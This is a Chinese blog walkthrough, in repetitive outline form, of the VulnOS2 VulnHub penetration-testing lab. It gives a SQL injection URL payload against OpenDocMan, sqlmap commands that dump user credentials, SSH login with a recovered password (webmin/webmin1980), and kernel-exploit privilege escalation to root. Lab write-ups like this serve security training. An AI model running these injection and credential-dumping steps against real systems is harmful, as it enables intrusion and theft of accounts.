渗透测试实战-Vuulnhub-Vulnos2
VulnOs2 - 幕布
VulnOs2
- 基本介绍和信息
- 目标
- 渗透服务器上这个公司的网站,获取root权限并找到Flag
-
- 网站情况
- JABC a bioware company

- JABC a bioware company
- 端口探测
-
- 目录探测
- robots.txt
- 没有得到什么重要的信息

- 没有得到什么重要的信息
- 使用dirb扫描也没有什么重大的收获
- 通过在网上查找,有人说在http://192.168.1.20/jabc/?q=node/7的 源码中有可以利用的信息
- 首先界面上是没有什么重要的信息

- 首先界面上是没有什么重要的信息
- 在源码中
- 找到了一个登录的地址/jabcd0cs

- 找到了一个登录的地址/jabcd0cs
- robots.txt
- 渗透服务器上这个公司的网站,获取root权限并找到Flag
- 目标
- 发现登录后台
- 也可以在那个界面全选
-
- http://192.168.1.20/jabcd0cs
- 是一个OpenDoc Man 的界面

- 是一个OpenDoc Man 的界面
- 查找相关漏洞 在https://www.exploit-db.com/上可以进行搜索,根据opendocman的版本
- 上面有详细的信息

- 上面有详细的信息
- 基本的介绍
- SQL Injection[CWE-89] Improper Access Control[CWE-284]

- SQL Injection[CWE-89] Improper Access Control[CWE-284]
- details
-
- 使用kali自带的漏洞搜索工具searchploit opendocman 搜索
- 找到相应版本
-
- 打开后面对应的文件
- 跟在网站上查到的是一样的

- 跟在网站上查到的是一样的
- 找到相应版本
- sql
- The exploitation example below displays version of the MySQL server: http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%,v ersion%28%29,3,4,5,6,7,8,9
- 得到版本信息
-
- 有可能是用户名什么的
-
- 得到版本信息
- 使用sqlmap
- sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbms MySQL 5.5.47 --dbs
- 有效的数据库

- 有效的数据库
- 查看jabcd0cs数据库有哪些表 sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs --dbms MySQL 5.5.47 --tables
- 发现十五个表

- 发现十五个表
- 查看user表
- sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user --dbms MySQL 5.5.47 --columns

- sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user --dbms MySQL 5.5.47 --columns
- 查看username 和password字段
- sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user -C "username,password" --dbms MySQL 5.5.47 --dump

- sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user -C "username,password" --dbms MySQL 5.5.47 --dump
- 对密码进行解密
-
- sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbms MySQL 5.5.47 --dbs
- 还可以
- 获取密码

- 获取密码
- The exploitation example below displays version of the MySQL server: http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%,v ersion%28%29,3,4,5,6,7,8,9
- 也可以在那个界面全选
- 登录SSH
- 使用webmin webmin1980登录
-
- 使用webmin webmin1980登录
- 探索一番后没有找到有用的,查看一下内核
- 内核版本
-
- 查找对应 漏洞
- 同样是searchsploit 命令

- 同样是searchsploit 命令
- 在Kali上建立临时HTTP服务,在目标机上下载
-
- 进行编译,修改权限,并运行,最后得到了具有root权限的shell
-
- 进入根目录查看flag
-
- 内核版本
以上内容整理于 幕布
作者:llzz38
出处:http://www.cnblogs.com/llzz38/
如果您觉得阅读本文对您有帮助,请点击一下右下方的推荐按钮,您的推荐将是我写作的最大动力!
版权声明:本文为博主原创或转载文章,欢迎转载,但转载文章之后必须在文章页面明显位置注明出处,否则保留追究法律责任的权利。
出处:http://www.cnblogs.com/llzz38/
如果您觉得阅读本文对您有帮助,请点击一下右下方的推荐按钮,您的推荐将是我写作的最大动力!
版权声明:本文为博主原创或转载文章,欢迎转载,但转载文章之后必须在文章页面明显位置注明出处,否则保留追究法律责任的权利。














浙公网安备 33010602011771号